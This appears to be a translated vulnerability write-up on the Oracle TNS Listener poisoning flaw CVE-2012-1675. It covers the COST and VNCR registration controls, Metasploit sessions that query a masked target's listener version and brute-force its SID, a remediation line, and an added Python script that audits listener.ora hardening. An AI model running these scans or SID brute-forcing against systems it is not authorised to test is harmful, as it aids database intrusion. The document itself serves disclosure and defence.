Oracle TNS Listener Remote Poisoning
Remote Data Poisoning Vulnerability (CVE-2012-1675)
1. Vulnerability overview:
A vulnerability that allows an attacker, without supplying a username/password, to poison the data handled by the remote "TNS Listener" component.
COST is short for "class of secure transports". It is a security control mechanism provided to govern instance registration. For a given listener, it restricts which instances may register and over which protocols. This prevents other remote instances from registering maliciously and the resulting risks such as information disclosure.
It is enabled by setting the parameter SECURE_REGISTER_listener_name in listener.ora to a transport list (a restricted list of registration protocols, such as IPC, TCP, TCPS). This feature has been supported since version 10.2.0.3 (although the 10g R2 online documentation does not state this explicitly) and remains available in 11.2.0.4 and later. However, from 11.2.0.4 onward, Oracle recommends using the default VNCR configuration.
2. Impact:
An attacker can, without a username or password, exploit the data messages transmitted over the network (both encrypted and unencrypted data); combined with CVE-2012-3137 (used for password cracking), this can further affect or even take control of any database on the local network.
3. Verification:
msf:
use auxiliary/admin/oracle/tnscmd
use auxiliary/admin/oracle/sid_brute
tnscmd: this vulnerability allows Oracle's memory information to be retrieved remotely; if data from memory can be obtained, the vulnerability is present.
sid_brute: brute-forces the Oracle SID
msf > use auxiliary/admin/oracle/tnscmd
msf auxiliary(tnscmd) > info
Name: Oracle TNS Listener Command Issuer
Module: auxiliary/admin/oracle/tnscmd
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2009-02-01
Provided by:
MC <mc@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOST yes The target address
RPORT 1521 yes The target port (TCP)
Description:
This module allows for the sending of arbitrary TNS commands in
order to gather information. Inspired from tnscmd.pl from
www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd
msf auxiliary(tnscmd) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf auxiliary(tnscmd) > show options
Module options (auxiliary/admin/oracle/tnscmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOST www.xxxx.cc yes The target address
RPORT 1521 yes The target port (TCP)
msf auxiliary(tnscmd) > run
[*] www.xxxx.cc:1521 - Sending '(CONNECT_DATA=(COMMAND=VERSION))' to www.xxxx.cc:1521
[*] www.xxxx.cc:1521 - writing 90 bytes.
[*] www.xxxx.cc:1521 - reading
[*] www.xxxx.cc:1521 - .M.......6.........-. ..........(DESCRIPTION=(TMP=)(VSNNUM=169869568)(ERR=0)).\........TNSLSNR for Linux: Version 10.2.0.1.0 - Production..TNS for Linux: Version 10.2.0.1.0 - Production..Unix Domain Socket IPC NT Protocol Adaptor for Linux: Version 10.2.0.1.0 - Production..Oracle Bequeath NT Protocol Adapter for Linux: Version 10.2.0.1.0 - Production..TCP/IP NT Protocol Adapter for Linux: Version 10.2.0.1.0 - Production,,.........@
[*] Auxiliary module execution completed
msf auxiliary(tnscmd) > use auxiliary/admin/oracle/sid_brute
msf auxiliary(sid_brute) > show options
Module options (auxiliary/admin/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port (TCP)
SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.
msf auxiliary(sid_brute) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf auxiliary(sid_brute) > show options
Module options (auxiliary/admin/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST www.xxxx.cc yes The target address
RPORT 1521 yes The target port (TCP)
SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.
msf auxiliary(sid_brute) > run
[*] www.xxxx.cc:1521 - Starting brute force on www.xxxx.cc, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] www.xxxx.cc:1521 - www.xxxx.cc:1521 Found SID 'ORCL'
[*] www.xxxx.cc:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf auxiliary(sid_brute) >
Scan with Nessus

4. Remediation
Update and upgrade to the latest Oracle version.
References:
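To check whether a listener.ora actually applies the COST and VNCR registration restrictions described in section 1, which is what the remediation above should leave in place, here is an added Python audit script (not part of the original post). The listener.ora fragments, the host name dbhost.example and the single-line parameter layout it parses are constructed assumptions.

```python
import re

# Constructed listener.ora fragments (sample data, not from the original post).
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )
"""

# Same listener with COST restricted to local IPC registration and VNCR enabled.
HARDENED_LISTENER_ORA = WEAK_LISTENER_ORA + """
SECURE_REGISTER_LISTENER = (IPC)
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON
REGISTRATION_INVITED_NODES_LISTENER = (dbhost.example)
"""


def listener_names(text):
    """Listener names: a bare 'NAME =' line opening a DESCRIPTION_LIST block (assumed layout)."""
    return re.findall(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*$", text, re.M)


def param(text, name):
    """Return the value of a single-line 'NAME = value' parameter, or None if absent."""
    m = re.search(rf"^\s*{re.escape(name)}\s*=\s*(.+?)\s*$", text, re.M | re.I)
    return m.group(1) if m else None


def audit(text):
    """Per listener: is remote registration blocked by COST, by VNCR, or by neither?"""
    findings = {}
    for lsnr in listener_names(text):
        cost = param(text, f"SECURE_REGISTER_{lsnr}")
        vncr = param(text, f"VALID_NODE_CHECKING_REGISTRATION_{lsnr}")
        # No SECURE_REGISTER_<listener> means any transport, including remote TCP, may register.
        transports = {t.strip().upper() for t in cost.strip("()").split(",")} if cost else set()
        # Plain TCP in the list still lets an unauthenticated remote instance register.
        cost_ok = bool(transports) and "TCP" not in transports
        # Any VNCR mode other than OFF/0 limits registration to local or invited nodes.
        vncr_ok = vncr is not None and vncr.strip().upper() not in ("OFF", "0")
        findings[lsnr] = {"cost_ok": cost_ok, "vncr_ok": vncr_ok,
                          "protected": cost_ok or vncr_ok}
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        print(label, audit(cfg))
```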
https://www.cnblogs.com/chendeming/p/9087493.html
https://blog.csdn.net/archersaber39/article/details/78932530
http://www.freebuf.com/articles/database/54289.html
